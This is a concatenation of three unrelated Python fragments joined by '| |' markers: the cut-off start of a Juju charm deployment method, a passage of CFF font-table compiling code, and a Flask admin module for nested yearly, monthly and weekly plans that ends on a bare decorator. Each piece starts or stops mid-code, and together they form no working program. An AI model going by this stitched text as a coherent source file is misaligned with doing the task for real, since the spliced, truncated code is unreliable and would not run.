async def DeployCharms(
self,
model_name,
application_name,
vnfd,
charm_path,
params={},
machine_spec={},
callback=None,
*callback_args
):
"""Deploy one or more charms associated with a VNF.
Deploy the charm(s) referenced in a | |
range(len(encoding)):
name = encoding[code]
if name != ".notdef":
m[name] = code
ranges = []
first = None
end = 0
for name in charset[1:]:
code = m.get(name, -1)
if first is None:
first = code
elif end + 1 != code:
nLeft = end - first
ranges.append((first, nLeft))
first = code
end = code
nLeft = end - first
ranges.append((first, nLeft))
# remove unencoded glyphs at the end.
while ranges and ranges[-1][0] == -1:
ranges.pop()
data = [packCard8(fmt), packCard8(len(ranges))]
for first, nLeft in ranges:
if first == -1: # unencoded
first = 0
data.append(packCard8(first) + packCard8(nLeft))
return bytesjoin(data)
class FDArrayConverter(TableConverter):
def _read(self, parent, value):
try:
vstore = parent.VarStore
except AttributeError:
vstore = None
file = parent.file
isCFF2 = parent._isCFF2
file.seek(value)
fdArray = FDArrayIndex(file, isCFF2=isCFF2)
fdArray.vstore = vstore
fdArray.strings = parent.strings
fdArray.GlobalSubrs = parent.GlobalSubrs
return fdArray
def write(self, parent, value):
return 0 # dummy value
def xmlRead(self, name, attrs, content, parent):
fdArray = FDArrayIndex()
for element in content:
if isinstance(element, str):
continue
name, attrs, content = element
fdArray.fromXML(name, attrs, content)
return fdArray
class FDSelectConverter(SimpleConverter):
def _read(self, parent, value):
file = parent.file
file.seek(value)
fdSelect = FDSelect(file, parent.numGlyphs)
return fdSelect
def write(self, parent, value):
return 0 # dummy value
# The FDSelect glyph data is written out to XML in the charstring keys,
# so we write out only the format selector
def xmlWrite(self, xmlWriter, name, value):
xmlWriter.simpletag(name, [('format', value.format)])
xmlWriter.newline()
def xmlRead(self, name, attrs, content, parent):
fmt = safeEval(attrs["format"])
file = None
numGlyphs = None
fdSelect = FDSelect(file, numGlyphs, fmt)
return fdSelect
class VarStoreConverter(SimpleConverter):
def _read(self, parent, value):
file = parent.file
file.seek(value)
varStore = VarStoreData(file)
varStore.decompile()
return varStore
def write(self, parent, value):
return 0 # dummy value
def xmlWrite(self, xmlWriter, name, value):
value.writeXML(xmlWriter, name)
def xmlRead(self, name, attrs, content, parent):
varStore = VarStoreData()
varStore.xmlRead(name, attrs, content, parent)
return varStore
def packFDSelect0(fdSelectArray):
fmt = 0
data = [packCard8(fmt)]
for index in fdSelectArray:
data.append(packCard8(index))
return bytesjoin(data)
def packFDSelect3(fdSelectArray):
fmt = 3
fdRanges = []
lenArray = len(fdSelectArray)
lastFDIndex = -1
for i in range(lenArray):
fdIndex = fdSelectArray[i]
if lastFDIndex != fdIndex:
fdRanges.append([i, fdIndex])
lastFDIndex = fdIndex
sentinelGID = i + 1
data = [packCard8(fmt)]
data.append(packCard16(len(fdRanges)))
for fdRange in fdRanges:
data.append(packCard16(fdRange[0]))
data.append(packCard8(fdRange[1]))
data.append(packCard16(sentinelGID))
return bytesjoin(data)
def packFDSelect4(fdSelectArray):
fmt = 4
fdRanges = []
lenArray = len(fdSelectArray)
lastFDIndex = -1
for i in range(lenArray):
fdIndex = fdSelectArray[i]
if lastFDIndex != fdIndex:
fdRanges.append([i, fdIndex])
lastFDIndex = fdIndex
sentinelGID = i + 1
data = [packCard8(fmt)]
data.append(packCard32(len(fdRanges)))
for fdRange in fdRanges:
data.append(packCard32(fdRange[0]))
data.append(packCard16(fdRange[1]))
data.append(packCard32(sentinelGID))
return bytesjoin(data)
class FDSelectCompiler(object):
def __init__(self, fdSelect, parent):
fmt = fdSelect.format
fdSelectArray = fdSelect.gidArray
if fmt == 0:
self.data = packFDSelect0(fdSelectArray)
elif fmt == 3:
self.data = packFDSelect3(fdSelectArray)
elif fmt == 4:
self.data = packFDSelect4(fdSelectArray)
else:
# choose smaller of the two formats
data0 = packFDSelect0(fdSelectArray)
data3 = packFDSelect3(fdSelectArray)
if len(data0) < len(data3):
self.data = data0
fdSelect.format = 0
else:
self.data = data3
fdSelect.format = 3
self.parent = parent
def setPos(self, pos, endPos):
self.parent.rawDict["FDSelect"] = pos
def getDataLength(self):
return len(self.data)
def toFile(self, file):
file.write(self.data)
class VarStoreCompiler(object):
def __init__(self, varStoreData, parent):
self.parent = parent
if not varStoreData.data:
varStoreData.compile()
data = [
packCard16(len(varStoreData.data)),
varStoreData.data
]
self.data = bytesjoin(data)
def setPos(self, pos, endPos):
self.parent.rawDict["VarStore"] = pos
def getDataLength(self):
return len(self.data)
def toFile(self, file):
file.write(self.data)
class ROSConverter(SimpleConverter):
def xmlWrite(self, xmlWriter, name, value):
registry, order, supplement = value
xmlWriter.simpletag(
name,
[
('Registry', tostr(registry)),
('Order', tostr(order)),
('Supplement', supplement)
])
xmlWriter.newline()
def xmlRead(self, name, attrs, content, parent):
return (attrs['Registry'], attrs['Order'], safeEval(attrs['Supplement']))
topDictOperators = [
# opcode name argument type default converter
(25, 'maxstack', 'number', None, None),
((12, 30), 'ROS', ('SID', 'SID', 'number'), None, ROSConverter()),
((12, 20), 'SyntheticBase', 'number', None, None),
(0, 'version', 'SID', None, None),
(1, 'Notice', 'SID', None, Latin1Converter()),
((12, 0), 'Copyright', 'SID', None, Latin1Converter()),
(2, 'FullName', 'SID', None, None),
((12, 38), 'FontName', 'SID', None, None),
(3, 'FamilyName', 'SID', None, None),
(4, 'Weight', 'SID', None, None),
((12, 1), 'isFixedPitch', 'number', 0, None),
((12, 2), 'ItalicAngle', 'number', 0, None),
((12, 3), 'UnderlinePosition', 'number', -100, None),
((12, 4), 'UnderlineThickness', 'number', 50, None),
((12, 5), 'PaintType', 'number', 0, None),
((12, 6), 'CharstringType', 'number', 2, None),
((12, 7), 'FontMatrix', 'array', [0.001, 0, 0, 0.001, 0, 0], None),
(13, 'UniqueID', 'number', None, None),
(5, 'FontBBox', 'array', [0, 0, 0, 0], None),
((12, 8), 'StrokeWidth', 'number', 0, None),
(14, 'XUID', 'array', None, None),
((12, 21), 'PostScript', 'SID', None, None),
((12, 22), 'BaseFontName', 'SID', None, None),
((12, 23), 'BaseFontBlend', 'delta', None, None),
((12, 31), 'CIDFontVersion', 'number', 0, None),
((12, 32), 'CIDFontRevision', 'number', 0, None),
((12, 33), 'CIDFontType', 'number', 0, None),
((12, 34), 'CIDCount', 'number', 8720, None),
(15, 'charset', 'number', None, CharsetConverter()),
((12, 35), 'UIDBase', 'number', None, None),
(16, 'Encoding', 'number', 0, EncodingConverter()),
(18, 'Private', ('number', 'number'), None, PrivateDictConverter()),
((12, 37), 'FDSelect', 'number', None, FDSelectConverter()),
((12, 36), 'FDArray', 'number', None, FDArrayConverter()),
(17, 'CharStrings', 'number', None, CharStringsConverter()),
(24, 'VarStore', 'number', None, VarStoreConverter()),
]
topDictOperators2 = [
# opcode name argument type default converter
(25, 'maxstack', 'number', None, None),
((12, 7), 'FontMatrix', 'array', [0.001, 0, 0, 0.001, 0, 0], None),
((12, 37), 'FDSelect', 'number', None, FDSelectConverter()),
((12, 36), 'FDArray', 'number', None, FDArrayConverter()),
(17, 'CharStrings', 'number', None, CharStringsConverter()),
(24, 'VarStore', 'number', None, VarStoreConverter()),
]
# Note! FDSelect and FDArray must both preceed CharStrings in the output XML build order,
# in order for the font to compile back from xml.
kBlendDictOpName = "blend"
blendOp = 23
privateDictOperators = [
# opcode name argument type default converter
(22, "vsindex", 'number', None, None),
(blendOp, kBlendDictOpName, 'blendList', None, None), # This is for reading to/from XML: it not written to CFF.
(6, 'BlueValues', 'delta', None, None),
(7, 'OtherBlues', 'delta', None, None),
(8, 'FamilyBlues', 'delta', None, None),
(9, 'FamilyOtherBlues', 'delta', None, None),
((12, 9), 'BlueScale', 'number', 0.039625, None),
((12, 10), 'BlueShift', 'number', 7, None),
((12, 11), 'BlueFuzz', 'number', 1, None),
(10, 'StdHW', 'number', None, None),
(11, 'StdVW', 'number', None, None),
((12, 12), 'StemSnapH', 'delta', None, None),
((12, 13), 'StemSnapV', 'delta', None, None),
((12, 14), 'ForceBold', 'number', 0, None),
((12, 15), 'ForceBoldThreshold', 'number', None, None), # deprecated
((12, 16), 'lenIV', 'number', None, None), # deprecated
((12, 17), 'LanguageGroup', 'number', 0, None),
((12, 18), 'ExpansionFactor', 'number', 0.06, None),
((12, 19), 'initialRandomSeed', 'number', 0, None),
(20, 'defaultWidthX', 'number', 0, None),
(21, 'nominalWidthX', 'number', 0, None),
(19, 'Subrs', 'number', None, SubrsConverter()),
]
privateDictOperators2 = [
# opcode name argument type default converter
(22, "vsindex", 'number', None, None),
(blendOp, kBlendDictOpName, 'blendList', None, None), # This is for reading to/from XML: it not written to CFF.
(6, 'BlueValues', 'delta', None, None),
(7, 'OtherBlues', 'delta', None, None),
(8, 'FamilyBlues', 'delta', None, None),
(9, 'FamilyOtherBlues', 'delta', None, None),
((12, 9), 'BlueScale', 'number', 0.039625, None),
((12, 10), 'BlueShift', 'number', 7, None),
((12, 11), 'BlueFuzz', 'number', 1, None),
(10, 'StdHW', 'number', None, None),
(11, 'StdVW', 'number', None, None),
((12, 12), 'StemSnapH', 'delta', None, None),
((12, 13), 'StemSnapV', 'delta', None, None),
((12, 17), 'LanguageGroup', 'number', 0, None),
((12, 18), 'ExpansionFactor', 'number', 0.06, None),
(19, 'Subrs', 'number', None, SubrsConverter()),
]
def addConverters(table):
for i in range(len(table)):
op, name, arg, default, conv = table[i]
if conv is not None:
continue
if arg in ("delta", "array"):
conv = ArrayConverter()
elif arg == "number":
conv = NumberConverter()
elif arg == "SID":
conv = ASCIIConverter()
elif arg == 'blendList':
conv = None
else:
assert False
table[i] = op, name, arg, default, conv
addConverters(privateDictOperators)
addConverters(topDictOperators)
class TopDictDecompiler(psCharStrings.DictDecompiler):
operators = buildOperatorDict(topDictOperators)
class PrivateDictDecompiler(psCharStrings.DictDecompiler):
operators = buildOperatorDict(privateDictOperators)
class DictCompiler(object):
maxBlendStack = 0
def __init__(self, dictObj, strings, parent, isCFF2=None):
if strings:
assert isinstance(strings, IndexedStrings)
if isCFF2 is None and hasattr(parent, "isCFF2"):
isCFF2 = parent.isCFF2
assert isCFF2 is not None
self.isCFF2 = isCFF2
self.dictObj = dictObj
self.strings = strings
self.parent = parent
rawDict = {}
for name in dictObj.order:
value = getattr(dictObj, name, None)
if value is None:
continue
conv = dictObj.converters[name]
value = conv.write(dictObj, value)
if value == dictObj.defaults.get(name):
continue
rawDict[name] = value
self.rawDict = rawDict
def setPos(self, pos, endPos):
pass
def getDataLength(self):
return len(self.compile("getDataLength"))
def compile(self, reason):
log.log(DEBUG, "-- compiling %s for %s", self.__class__.__name__, reason)
rawDict = self.rawDict
data = []
for name in self.dictObj.order:
value = rawDict.get(name)
if value is None:
continue
op, argType = self.opcodes[name]
if isinstance(argType, tuple):
l = len(argType)
assert len(value) == l, "value doesn't match arg type"
for i in range(l):
arg = argType[i]
v = value[i]
arghandler = getattr(self, "arg_" + arg)
data.append(arghandler(v))
else:
arghandler = getattr(self, "arg_" + argType)
data.append(arghandler(value))
data.append(op)
data = bytesjoin(data)
return data
def toFile(self, file):
data = self.compile("toFile")
file.write(data)
def arg_number(self, num):
if isinstance(num, list):
data = [encodeNumber(val) for val in num]
data.append(encodeNumber(1))
data.append(bytechr(blendOp))
datum = bytesjoin(data)
else:
datum = encodeNumber(num)
return datum
def arg_SID(self, s):
return psCharStrings.encodeIntCFF(self.strings.getSID(s))
def arg_array(self, value):
data = []
for num in value:
data.append(self.arg_number(num))
return bytesjoin(data)
def arg_delta(self, value):
if not value:
return b""
val0 = value[0]
if isinstance(val0, list):
data = self.arg_delta_blend(value)
else:
out = []
last = 0
for v in value:
out.append(v - last)
last = v
data = []
for num in out:
data.append(encodeNumber(num))
return bytesjoin(data)
def arg_delta_blend(self, value):
"""A delta list with blend lists has to be *all* blend lists.
The value is a list is arranged as follows::
[
[V0, d0..dn]
[V1, d0..dn]
...
[Vm, d0..dn]
]
``V`` is the absolute coordinate value from the default font, and ``d0-dn``
are the delta values from the *n* regions. Each ``V`` is an absolute
coordinate from the default font.
We want to return a list::
[
[v0, v1..vm]
[d0..dn]
...
[d0..dn]
numBlends
blendOp
]
where each ``v`` is relative to the previous default font value.
"""
numMasters = len(value[0])
numBlends = len(value)
numStack = (numBlends * numMasters) + 1
if numStack > self.maxBlendStack:
# Figure out the max number of value we can blend
# and divide this list up into chunks of that size.
numBlendValues = int((self.maxBlendStack - 1) / numMasters)
out = []
while True:
numVal = min(len(value), numBlendValues)
if numVal == 0:
break
valList = value[0:numVal]
out1 = self.arg_delta_blend(valList)
out.extend(out1)
value = value[numVal:]
else:
firstList = [0] * numBlends
deltaList = [None] * numBlends
i = 0
prevVal = 0
while i < numBlends:
# For PrivateDict BlueValues, the default font
# values are absolute, not relative.
# Must convert these back to relative coordinates
# befor writing to CFF2.
defaultValue = value[i][0]
firstList[i] = defaultValue - prevVal
prevVal = defaultValue
deltaList[i] = value[i][1:]
i += 1
relValueList = firstList
for blendList in deltaList:
relValueList.extend(blendList)
out = [encodeNumber(val) for val in relValueList]
out.append(encodeNumber(numBlends))
out.append(bytechr(blendOp))
return out
def encodeNumber(num):
if isinstance(num, float):
return psCharStrings.encodeFloat(num)
else:
return psCharStrings.encodeIntCFF(num)
class TopDictCompiler(DictCompiler):
opcodes = buildOpcodeDict(topDictOperators)
def getChildren(self, strings):
isCFF2 = self.isCFF2
children = []
if self.dictObj.cff2GetGlyphOrder is None:
if hasattr(self.dictObj, "charset") and self.dictObj.charset:
if hasattr(self.dictObj, "ROS"): # aka isCID
charsetCode = None
else:
charsetCode = getStdCharSet(self.dictObj.charset)
if charsetCode is None:
children.append(CharsetCompiler(strings, self.dictObj.charset, self))
else:
self.rawDict["charset"] = charsetCode
if hasattr(self.dictObj, "Encoding") and self.dictObj.Encoding:
encoding = self.dictObj.Encoding
if not isinstance(encoding, str):
children.append(EncodingCompiler(strings, encoding, self))
else:
if hasattr(self.dictObj, "VarStore"):
varStoreData = self.dictObj.VarStore
varStoreComp = VarStoreCompiler(varStoreData, self)
children.append(varStoreComp)
if hasattr(self.dictObj, "FDSelect"):
# I have not yet supported merging a ttx CFF-CID font, as there are
# interesting issues about merging the FDArrays. Here I assume that
# either the font was read from XML, and the FDSelect indices are all
# in the charstring data, or the FDSelect array is already fully defined.
fdSelect = self.dictObj.FDSelect
# probably read in from XML; assume fdIndex in CharString data
if len(fdSelect) == 0:
charStrings = self.dictObj.CharStrings
for name in self.dictObj.charset:
fdSelect.append(charStrings[name].fdSelectIndex)
fdSelectComp = FDSelectCompiler(fdSelect, self)
children.append(fdSelectComp)
if hasattr(self.dictObj, "CharStrings"):
items = []
charStrings = self.dictObj.CharStrings
for name in self.dictObj.charset:
items.append(charStrings[name])
charStringsComp = CharStringsCompiler(
items, strings, self, isCFF2=isCFF2)
children.append(charStringsComp)
if hasattr(self.dictObj, "FDArray"):
# I have not yet supported merging a ttx CFF-CID font, as there are
# interesting issues about merging the FDArrays. Here I assume that the
# FDArray info is correct and complete.
fdArrayIndexComp = self.dictObj.FDArray.getCompiler(strings, self)
children.append(fdArrayIndexComp)
children.extend(fdArrayIndexComp.getChildren(strings))
if hasattr(self.dictObj, "Private"):
privComp = self.dictObj.Private.getCompiler(strings, self)
children.append(privComp)
children.extend(privComp.getChildren(strings))
return children
class FontDictCompiler(DictCompiler):
opcodes = buildOpcodeDict(topDictOperators)
def __init__(self, dictObj, strings, parent, isCFF2=None):
super(FontDictCompiler, self).__init__(dictObj, strings, parent, isCFF2=isCFF2)
#
# We now take some effort to detect if there were any key/value pairs
# supplied that were ignored in the FontDict context, and issue a warning
# for those cases.
#
ignoredNames = []
dictObj = self.dictObj
for name in sorted(set(dictObj.converters) - set(dictObj.order)):
if name in dictObj.rawDict:
# The font was directly read from binary. In this
# case, we want to report *all* "useless" key/value
# pairs that are in the font, not just the ones that
# are different from the default.
ignoredNames.append(name)
else:
# The font was probably read from a TTX file. We only
# warn about keys whos value is not the default. The
# ones that have the default value will not be written
# to binary anyway.
default = dictObj.defaults.get(name)
if default is not None:
conv = dictObj.converters[name]
default = conv.read(dictObj, default)
if getattr(dictObj, name, None) != default:
ignoredNames.append(name)
if ignoredNames:
log.warning(
"Some CFF FDArray/FontDict keys were ignored upon compile: " +
" ".join(sorted(ignoredNames)))
def getChildren(self, strings):
children = []
if hasattr(self.dictObj, "Private"):
privComp = self.dictObj.Private.getCompiler(strings, self)
children.append(privComp)
children.extend(privComp.getChildren(strings))
return children
class PrivateDictCompiler(DictCompiler):
maxBlendStack = maxStackLimit
opcodes = buildOpcodeDict(privateDictOperators)
def setPos(self, pos, endPos):
size = endPos - pos
self.parent.rawDict["Private"] = size, pos
self.pos = pos
def getChildren(self, strings):
children = []
if hasattr(self.dictObj, "Subrs"):
children.append(self.dictObj.Subrs.getCompiler(strings, self))
return children
class BaseDict(object):
def __init__(self, strings=None, file=None, offset=None, | |
# -*- coding: utf-8 -*-
# @Time : 2019-12-24
# @Author : mizxc
# @Email : <EMAIL>
import datetime
from flask import current_app, request, flash, render_template, redirect, url_for, jsonify
from flask_login import login_required, current_user
from . import bpAdmin
from project.common.dataPreprocess import strLength, strToDatetime
from project.model.timeManagement import *
from project.common.dataPreprocess import getPagingParameters
@bpAdmin.route("/timeManagementTodayBoard")
@login_required
def timeManagementTodayBoard():
currentDate = str(datetime.datetime.now()).split(' ')[0]
dp = DailyPlan.objects(whichDay=currentDate).first()
return render_template('admin/timeManagementTodayBoard.html',dp=dp)
@bpAdmin.route("/timeManagementBoard/<planType>/<id>")
@login_required
def timeManagementBoard(planType,id):
if planType == 'yp':
p = YearlyPlan.objects(id=id).first()
sps = MonthlyPlan.objects(yearlyPlan=p).order_by('-id')
subPlanType = 'mp'
elif planType == 'mp':
p = MonthlyPlan.objects(id=id).first()
sps = WeeklyPlan.objects(monthlyPlan=p).order_by('-id')
subPlanType = 'wp'
elif planType == 'wp':
p = WeeklyPlan.objects(id=id).first()
sps = DailyPlan.objects(weeklyPlan=p).order_by('-id')
subPlanType = 'dp'
elif planType == 'dp':
p = DailyPlan.objects(id=id).first()
sps = []
subPlanType = ''
return render_template('admin/timeManagementBoard.html',
planType=planType,p=p,sps=sps,subPlanType=subPlanType)
@bpAdmin.route("/timeManagementWriteSummarize/<planType>/<id>",methods=['GET','POST'])
@login_required
def timeManagementWriteSummarize(planType,id):
if planType == 'yp':
p = YearlyPlan.objects(id=id).first()
elif planType == 'mp':
p = MonthlyPlan.objects(id=id).first()
elif planType == 'wp':
p = WeeklyPlan.objects(id=id).first()
elif planType == 'dp':
p = DailyPlan.objects(id=id).first()
if request.method == 'GET':
return render_template('admin/timeManagementWriteSummarize.html',
planType=planType,p=p)
if request.method == 'POST':
summarize = request.form['summarize']
if len(summarize)>15000:
return jsonify({'status': False, 'msg': u'请输入15000个字符内的总结!'})
p.summarize = summarize
p.save()
url = url_for('admin.timeManagementBoard',planType=planType,id=id)
return jsonify({'status': True, 'msg': u'总结提交成功!','url':url})
@bpAdmin.route("/timeManagementGetParentPlans",methods=['POST'])
@login_required
def timeManagementGetParentPlans():
id = request.form['id']
planType = request.form['planType']
p = None
if planType == 'yp':
p = YearlyPlan.objects(id=id).first()
elif planType == 'mp':
p = MonthlyPlan.objects(id=id).first()
elif planType == 'wp':
p = WeeklyPlan.objects(id=id).first()
html = ''
if p:
for item in p.plans:
if item.isDone:
done = '<i class="mdi mdi-check"></i>'
else:
done = ''
if item.level == 'L1':
html += '<li><label class="alert alert-danger">紧急重要:%s %s</label></li>' % (item.title,done)
elif item.level == 'L2':
html += '<li><label class="alert alert-warning">紧急不重要:%s %s</label></li>' % (item.title,done)
elif item.level == 'L3':
html += '<li><label class="alert alert-info">重要不紧急:%s %s</label></li>' % (item.title,done)
elif item.level == 'L4':
html += '<li><label class="alert alert-success">不重要不紧急:%s %s</label></li>' % (item.title,done)
return jsonify({'status': True, 'data': {'parentPlanTitle':p.title,'parentPlanJobs':html}})
else:
return jsonify({'status': False})
@bpAdmin.route("/timeManagementPlanDone",methods=['POST'])
@login_required
def timeManagementPlanDone():
try:
id = request.form['id']
planType = request.form['planType']
number = int(request.form['number'])
if planType == 'yp':
p = YearlyPlan.objects(id=id).first()
if p.plans[number].isDone == False:
p.plans[number].isDone = True
else:
p.plans[number].isDone = False
doneCount = 0
for i in p.plans:
if i.isDone:doneCount+=1
p.doneCount = doneCount
p.save()
elif planType == 'mp':
p = MonthlyPlan.objects(id=id).first()
if p.plans[number].isDone == False:
p.plans[number].isDone = True
else:
p.plans[number].isDone = False
doneCount = 0
for i in p.plans:
if i.isDone: doneCount += 1
p.doneCount = doneCount
p.save()
elif planType == 'wp':
p = WeeklyPlan.objects(id=id).first()
if p.plans[number].isDone == False:
p.plans[number].isDone = True
else:
p.plans[number].isDone = False
doneCount = 0
for i in p.plans:
if i.isDone: doneCount += 1
p.doneCount = doneCount
p.save()
elif planType == 'dp':
p = DailyPlan.objects(id=id).first()
if p.plans[number].isDone == False:
p.plans[number].isDone = True
else:
p.plans[number].isDone = False
doneCount = 0
for i in p.plans:
if i.isDone: doneCount += 1
p.doneCount = doneCount
p.save()
return jsonify({'status': True, 'info': u'提交任务成功!'})
except:
return jsonify({'status':False,'info':u'提交任务失败!'})
#年计划____________________________________________________________________________________________
@bpAdmin.route("/timeManagementYearlyPlan")
@login_required
def timeManagementYearlyPlan():
levels = current_app.config['PLAN_LEVEL']
yps = YearlyPlan.objects.order_by('-id')
return render_template('admin/timeManagementYearlyPlan.html',
levels=levels,yps=yps)
@bpAdmin.route("/timeManagementYearlyPlanAdd",methods=['POST'])
@login_required
def timeManagementYearlyPlanAdd():
title = request.form['title']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
if not strLength(title,1,100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的年计划标题'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间必须要晚于开始时间'})
#判断年计划时间是否冲突
yps = YearlyPlan.objects
for i in yps:
if not (startTime>i.endTime or endTime<i.startTime):
return jsonify({'status': False, 'info': u'年计划时间范围(%s - %s)与其他年计划时间(%s - %s)冲突!' %
(startTime,endTime,i.startTime,i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t) > 0:
p = Plan()
p.title = t
p.level = planLevel[index]
plans.append(p)
yearlyPlan = YearlyPlan()
yearlyPlan.title = title
yearlyPlan.startTime = startTime
yearlyPlan.endTime = endTime
yearlyPlan.plans = plans
yearlyPlan.save()
return jsonify({'status': True, 'info': u'年计划添加成功'})
@bpAdmin.route("/timeManagementYearlyPlanEdit/<id>",methods=['GET','POST'])
@login_required
def timeManagementYearlyPlanEdit(id):
yearlyPlan = YearlyPlan.objects(id=id).first()
levels = current_app.config['PLAN_LEVEL']
if request.method == 'GET':
return render_template('admin/timeManagementYearlyPlanEdit.html',
levels=levels, yearlyPlan=yearlyPlan,
startTime=str(yearlyPlan.startTime).split(' ')[0],
endTime=str(yearlyPlan.endTime).split(' ')[0])
if request.method == 'POST':
title = request.form['title']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
isDone = request.form.getlist('isDone[]')
if not strLength(title,1,100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的年计划标题'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间要晚于开始时间'})
# 判断年计划时间是否冲突
yps = YearlyPlan.objects
for i in yps:
if i == yearlyPlan: continue
if not (startTime > i.endTime or endTime < i.startTime):
return jsonify({'status': False, 'info': u'年计划时间范围(%s - %s)与其他年计划时间(%s - %s)冲突!' %
(startTime, endTime, i.startTime, i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t)>0:
p = Plan()
p.title = t
p.level = planLevel[index]
if isDone[index] == 'y':
p.isDone = True
else:
p.isDone = False
plans.append(p)
yearlyPlan.title = title
yearlyPlan.startTime = startTime
yearlyPlan.endTime = endTime
yearlyPlan.plans = plans
yearlyPlan.save()
return jsonify({'status': True, 'info': u'年计划修改成功'})
@bpAdmin.route("/timeManagementYearlyPlanDelete/<id>",methods=['GET'])
@login_required
def timeManagementYearlyPlanDelete(id):
#有子计划不能删除
p = YearlyPlan.objects(id=id).first()
if len(MonthlyPlan.objects(yearlyPlan=p))>0:
flash(u'该年计划有下属月计划,不能删除,请先删除下属月计划后,再删除年计划')
else:
p.delete()
flash(u'年计划删除成功')
return redirect(url_for('admin.timeManagementYearlyPlan'))
#年计划____________________________________________________________________________________________
#月计划____________________________________________________________________________________________
@bpAdmin.route("/timeManagementMonthlyPlan")
@login_required
def timeManagementMonthlyPlan():
levels = current_app.config['PLAN_LEVEL']
mps = MonthlyPlan.objects.order_by('-id')
yps = YearlyPlan.objects.order_by('-id')
return render_template('admin/timeManagementMonthlyPlan.html',
levels=levels,mps=mps,yps=yps)
@bpAdmin.route("/timeManagementMonthlyPlanAdd",methods=['POST'])
@login_required
def timeManagementMonthlyPlanAdd():
title = request.form['title']
yearlyPlanId = request.form['yearlyPlanId']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
if not strLength(title,1,100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的月计划标题!'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间必须要晚于开始时间'})
y = YearlyPlan.objects(id=yearlyPlanId).first()
#时间范围判断
#月计划的时间范围必须在年计划的时间范围内
if not (startTime>=y.startTime and endTime<=y.endTime):
return jsonify({'status': False, 'info': u'月计划的时间范围必须在年计划的时间范围内'})
#该年计划下的月计划时间范围不冲突
mps = MonthlyPlan.objects(yearlyPlan=y)
for i in mps:
if not (startTime >= i.endTime or endTime <= i.startTime):
return jsonify({'status': False, 'info': u'月计划的时间范围(%s - %s)和“%s”的时间范围(%s - %s)冲突' %
(startTime,endTime,i.title,i.startTime,i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t) > 0:
p = Plan()
p.title = t
p.level = planLevel[index]
plans.append(p)
m = MonthlyPlan()
m.title = title
m.startTime = startTime
m.endTime = endTime
m.plans = plans
m.yearlyPlan = y
m.save()
return jsonify({'status': True, 'info': u'月计划添加成功'})
@bpAdmin.route("/timeManagementMonthlyPlanEdit/<id>",methods=['GET','POST'])
@login_required
def timeManagementMonthlyPlanEdit(id):
m = MonthlyPlan.objects(id=id).first()
if request.method == 'GET':
levels = current_app.config['PLAN_LEVEL']
yps = YearlyPlan.objects.order_by('-id')
return render_template('admin/timeManagementMonthlyPlanEdit.html',
levels=levels, m=m, yps=yps,
startTime=str(m.startTime).split(' ')[0],
endTime=str(m.endTime).split(' ')[0])
if request.method == 'POST':
title = request.form['title']
yearlyPlanId = request.form['yearlyPlanId']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
isDone = request.form.getlist('isDone[]')
if not strLength(title, 1, 100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的月计划标题!'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围!'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间必须要晚于开始时间!'})
y = YearlyPlan.objects(id=yearlyPlanId).first()
# 时间范围判断
# 月计划的时间范围必须在年计划的时间范围内
if not (startTime >= y.startTime and endTime <= y.endTime):
return jsonify({'status': False, 'info': u'月计划的时间范围必须在年计划的时间范围内!'})
# 该年计划下的月计划时间范围不冲突
mps = MonthlyPlan.objects(yearlyPlan=y)
for i in mps:
if i==m:continue
if not (startTime >= i.endTime or endTime <= i.startTime):
return jsonify({'status': False, 'info':u'月计划的时间范围(%s - %s)和“%s”的时间范围(%s - %s)冲突' %
(startTime, endTime, i.title, i.startTime, i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t) > 0:
p = Plan()
p.title = t
p.level = planLevel[index]
if isDone[index] == 'y':
p.isDone = True
else:
p.isDone = False
plans.append(p)
m.title = title
m.startTime = startTime
m.endTime = endTime
m.plans = plans
m.yearlyPlan = y
m.save()
return jsonify({'status': True, 'info': u'月计划修改成功!'})
@bpAdmin.route("/timeManagementMonthlyPlanDelete/<id>",methods=['GET'])
@login_required
def timeManagementMonthlyPlanDelete(id):
# 有子计划不能删除
p = MonthlyPlan.objects(id=id).first()
if len(WeeklyPlan.objects(monthlyPlan=p)) > 0:
flash(u'该月计划有下属周计划,不能删除,请先删除下属周计划后,再删除月计划')
else:
p.delete()
flash(u'月计划删除成功')
return redirect(url_for('admin.timeManagementMonthlyPlan'))
#月计划____________________________________________________________________________________________
#周计划____________________________________________________________________________________________
@bpAdmin.route("/timeManagementWeeklyPlan")
@login_required
def timeManagementWeeklyPlan():
levels = current_app.config['PLAN_LEVEL']
wps = WeeklyPlan.objects.order_by('-id')
#只展示最近12个月
mps = MonthlyPlan.objects.order_by('-id')[:12]
return render_template('admin/timeManagementWeeklyPlan.html',
levels=levels,mps=mps,wps=wps)
@bpAdmin.route("/timeManagementWeeklyPlanAdd",methods=['POST'])
@login_required
